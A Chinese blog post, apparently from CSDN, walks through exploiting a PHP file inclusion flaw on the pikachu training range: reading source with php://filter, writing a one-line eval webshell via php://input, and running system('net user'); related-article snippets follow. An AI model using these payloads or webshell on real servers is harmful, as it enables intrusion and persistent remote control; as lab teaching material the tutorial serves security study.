包含漏洞-读写文件以及执行命令

最新推荐文章于 2024-05-17 03:58:40 发布
最新推荐文章于 2024-05-17 03:58:40 发布
阅读量498 收藏 2
点赞数 1
分类专栏: 渗透 文章标签: 文件包含漏洞 包含漏洞 写入木马 安全漏洞 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/126207678
版权

包含漏洞可以读写文件以及执行命令

读文件:

最好转化为base64,防止有特殊字符显示不出来

php://filter/read=convert.base64-encode/resource=【文件名】

用pikachu靶场演示:
读一下当前展示的这个PHP内容
在这里插入图片描述

写文件:

写入一句话木马 我用的是菜刀马 <?php @eval($_POST['123']);?>
需要修改一个地方 参数等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
之后在数据包里写入一句话
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[123]); ?>'); ?>
在这里插入图片描述

用菜刀连接:连接密码 123
由于是在当前文件夹写入的木马文件,所以是在fi_remote.php 同一目录下的
在这里插入图片描述

命令执行:

  • phpStudy 只有在allow _url_include为on的时候才可以使用
  • phpStudy 下找到php.ini打开,查找 disable_functions = 将其清空删掉重启apache 才能看到结果
    在这里插入图片描述

需要修改一个地方 参数等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input

提交数据包为:<?php system('net user');?>
在这里插入图片描述

常家壮
关注
专栏目录
文件包含漏洞学习笔记(详细)
2301_77451464的博客
03-18 968
文件包含的原理以及各种漏洞,并包含了伪协议的解题思路与过程
文件包含漏洞学习
willow_liang的博客
10-16 529
文件包含 文件包含的定义: 文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态包含在服务器的文件,从而导致恶意代码的执行及敏感信息泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式。 文件包含漏洞原理: 由于开发人员编写源码时将可重复使用的代码写入到单个的文件中,并在需要的时候将它们包含在特殊的功能代码文件中,这样被包含文件中的代码就会被解释执行。如果没有针对代码中存在文件包含的函数入口做过滤,就会导致客户端可以提交恶意构造语句提交,并交由服务器端解释执行。文件包含攻击可能存在于WEB服
PHP文件包含漏洞总结
坚持硬核
10-07 3414
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
学习笔记-文件包含漏洞,命令执行漏洞
阿达斯加的博客
05-23 391
文件包含漏洞 简介 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,其中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞文件包含漏洞利用 执行PHP代码 1.利用php://input伪协议 php://input可以获取POST的数据流。当它与包含函数结合时,php://input流会被当作php文件执行。从而
文件包含漏洞
2301_80661529的博客
03-07 1679
文件包含(File Inclusion)漏洞是一种常见的Web应用程序安全漏洞,它源于开发者在编写代码时,对用户可控的输入参数未进行充分的验证和过滤,使得攻击者能够通过输入恶意的文件路径,促使服务器加载并执行该路径下的文件。本地文件包含(Local File Inclusion, LFI):攻击者能够通过注入本地文件路径,读取或执行服务器本地文件。例如,攻击者可能利用此漏洞读取服务器的配置文件,获取敏感信息,或者包含并执行恶意脚本,如Webshell,从而控制服务器。php
详解文件包含漏洞_&lt; php show_source(__file__); error_reporting(1); i(3)
最新发布
2401_84976527的博客
05-17 795
htaccess是一个纯文本文件,里面存放着Apache服务器配置相关的一些指令,它类似于Apache的站点配置文件,但只作用于当前目录,而且是只有用户访问目录时才加载,通过该文件可以实现网页301重定向,自定义404错误页面,改变文件拓展名,禁止目录列表等。流程是先将三个过滤器叠加之后进行压缩,然后转小写,最后再解压,这样的流程执行结束后会导致部分死亡代码错误,便可以写进去我们想要写入的shell,原理很简单,就是利用过滤器嵌套的方式让死亡代码在各种变换之间进行分解扰乱,最终变成php无法识别的字符。
struts2绕过waf读写文件及另类方式执行命令1
08-03
首先,我们注意到标题提到的"struts2绕过waf读写文件及另类方式执行命令1",这表明我们将讨论Struts2框架中的一种或多种漏洞,这些漏洞可能导致攻击者能够绕过WAF的保护措施,执行命令或进行文件操作。 在描述中,...
struts2绕过waf读写文件及另类方式执行命令.doc
07-08
然而,Struts2在历史中存在一些安全漏洞,其中包括文件读写和命令执行的问题。本篇文章主要探讨了如何在WAF(Web应用防火墙)的防护下,通过Struts2绕过关键词限制来实现文件读写和命令执行。 首先,WAF通常会过滤...
Go代码审计:Gitea远程命令执行漏洞
01-27
本文将深入剖析一个发生在Gitea中的远程命令执行漏洞链,涉及逻辑错误导致的权限绕过、目录穿越漏洞以及利用这些漏洞读取配置文件并构造JWT密文的过程。 首先,问题的起因在于Git Large File Storage (Git LFS)的...
文件包含及代码执行及命令执行
j1044957016的博客
06-01 2568
文件包含,代码执行,命令执行常见的函数,以及如何绕过过滤
WEB安全基础 - - -命令执行漏洞
weixin_67503304的博客
07-28 1713
简要介绍命令执行漏洞的原理,总结了常用的PHP代码执行函数。
文件包含漏洞全面详解
heike_Ch的博客
04-24 1005
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
文件包含漏洞04】当服务器仅存在本地文件包含漏洞时,如何GetShell?
Fighting_hawk的博客
03-11 4725
1. 思路:第一步利用一切可能让服务器本地某个文件中含有一句话木马;第二步文件包含之让代码执行。 2. 思考:如果错误日志不是在默认位置,应该如何找到或者是否有其他途经? 3. 思考:如果靶机存在远程文件包含漏洞,攻击者在服务器2号上写一个一句话木马文件,利用靶机远程文件包含文件,并不能Get靶机Shell。后续应更加深入理解一句话木马的控制原理,以判断为什么无法实现,初步认为shell代码是在服务器2号上执行的。...
OS命令执行漏洞
Jim的博客
08-16 2307
代码执行漏洞指的是可以执行PHP脚本代码,而命令执行漏洞指的是可以执行系统命令或应用指令(如cmd命令或bash命令)的漏洞 php命令执行漏洞主要是一些函数的参数过滤不严格所导致,可以执行OS命令的函数一共有7个:system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open() 另外,反单引号(`)也
文件包含漏洞(input、filter、zip)
m0_70349048的博客
03-17 1491
可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。先访问这个页面然后抓包进行上传并访问恶意代码,可以看到phpinfo()已经执行。
使用蚁剑向网站上传小马
qq_67757718的博客
02-03 948
准备,被攻击的网站由PHP语言编写,创建一个php文件,编辑脚本<? php @eval($_POST['123'])?> sqlmap -u"http://43.138.211.45/about.php?listid=6" --os-shell进行攻击 选择语言,攻击的网站是由PHP语言编写,输入4,回车,输入y 输入2选择自定义位置,回车,输入根目录位置 查看网站的根目录是/var/www/html 回车得到 两个网址 复制第一个网址,在浏览器中打开
Struts2绕过WAF读写文件与命令执行技巧【案例分享】
总结来说,Struts2绕过waf读写文件及另类方式执行命令的过程中,关键在于理解waf的规则,灵活运用一些绕过技巧,并且在实际操作中深入挖掘漏洞的细节,这样才能最大程度地发挥漏洞的利用价值。同时,也需要十分谨慎...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值